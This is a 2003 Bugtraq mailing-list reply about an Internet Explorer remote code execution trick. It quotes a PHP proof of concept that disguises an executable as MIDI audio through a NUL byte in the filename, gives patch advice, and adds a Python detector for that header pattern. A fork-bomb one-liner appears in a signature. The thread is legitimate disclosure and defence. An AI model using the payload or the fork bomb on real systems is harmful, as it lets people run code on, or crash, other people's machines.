RE: IE remote code execution

From: Thor Larholm (thor_at_pivx.com)
Date: 10/20/03

    Date: Mon, 20 Oct 2003 11:42:35 -0700
    To: "Marcin Ulikowski" <r3b00t@tx.pl>, <bugtraq@securityfocus.com>
    
    

    A default Windows 98SE installation is several years behind in patches.

    This does not reproduce on any IE browser that has been patched in the
    last year or so.

    If in doubt about your IE patch level, apply the latest cumulative patch
    MS03-040, which can be found at

    http://www.microsoft.com/technet/security/bulletin/MS03-040.asp

    Regards
    Thor Larholm
    PivX Solutions, LLC - Senior Security Researcher
    http://pivx/com/larholm/ - Get our research, join our mailinglist

    -----Original Message-----
    From: Marcin Ulikowski [mailto:r3b00t@tx.pl]
    Sent: Saturday, October 18, 2003 3:16 PM
    To: bugtraq@securityfocus.com
    Subject: IE remote code execution

    This code can execute any code remotely using IE - as you can see very
    simple.

    // for IE 5, tested on default Windows 98SE installation
    <?php
    Header("Content-type: audio/midi");
    Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
    readfile("code.exe");
    ?>

    Here you have a demo:
    http://r3b00t.tx.pl/iexec5.php

    Can we expect more surprises like this one?

    --
    ------------------------------
    r3b00t ~ [http://r3b00t.tx.pl]
    just do main(){for(;;)fork();}
    ------------------------------
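
A detection-side check for the header pattern in the quoted proof of concept, added here as an example and not part of either message: it flags a Content-Disposition filename that carries a NUL byte (raw or percent-encoded) and an executable extension that disagrees with the declared media type. The function names, the extension list and the sample responses are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

# Assumed list of extensions treated as executable; extend for your environment.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd"}

_FILENAME_RE = re.compile(r'filename\s*=\s*("([^"]*)"|[^;]*)', re.IGNORECASE)


def _ext(name):
    """Return the lowercased extension of name, or '' if it has none."""
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def inspect_response(headers):
    """Return a list of findings for one response's headers (dict, any key case)."""
    h = {k.lower(): v for k, v in headers.items()}
    match = _FILENAME_RE.search(h.get("content-disposition", ""))
    if not match:
        return []
    raw = match.group(2) if match.group(2) is not None else match.group(1).strip()
    decoded = unquote(raw)  # turns %00 into a literal NUL
    findings = []
    segments = decoded.split("\x00")
    if len(segments) > 1:
        findings.append("nul-in-filename")  # never legitimate in a filename
        if len({_ext(s) for s in segments if s}) > 1:
            findings.append("extension-differs-across-nul")
    if any(_ext(s) in EXECUTABLE_EXTS for s in segments):
        findings.append("executable-extension")
        ctype = h.get("content-type", "").split(";")[0].strip().lower()
        if ctype.startswith(("audio/", "video/", "image/", "text/")):
            findings.append("content-type-mismatch")
    return findings


# Constructed sample responses; the first mirrors the headers quoted above.
SAMPLES = [
    {"Content-type": "audio/midi",
     "Content-Disposition": "inline; filename=readme.txt%00code.exe"},
    {"Content-Type": "audio/midi",
     "Content-Disposition": 'inline; filename="song.mid"'},
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s["Content-Disposition"], "->", inspect_response(s) or "clean")
```

The same logic can run over proxy or web-server response logs; it does not parse the RFC 5987 `filename*=` form.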
    
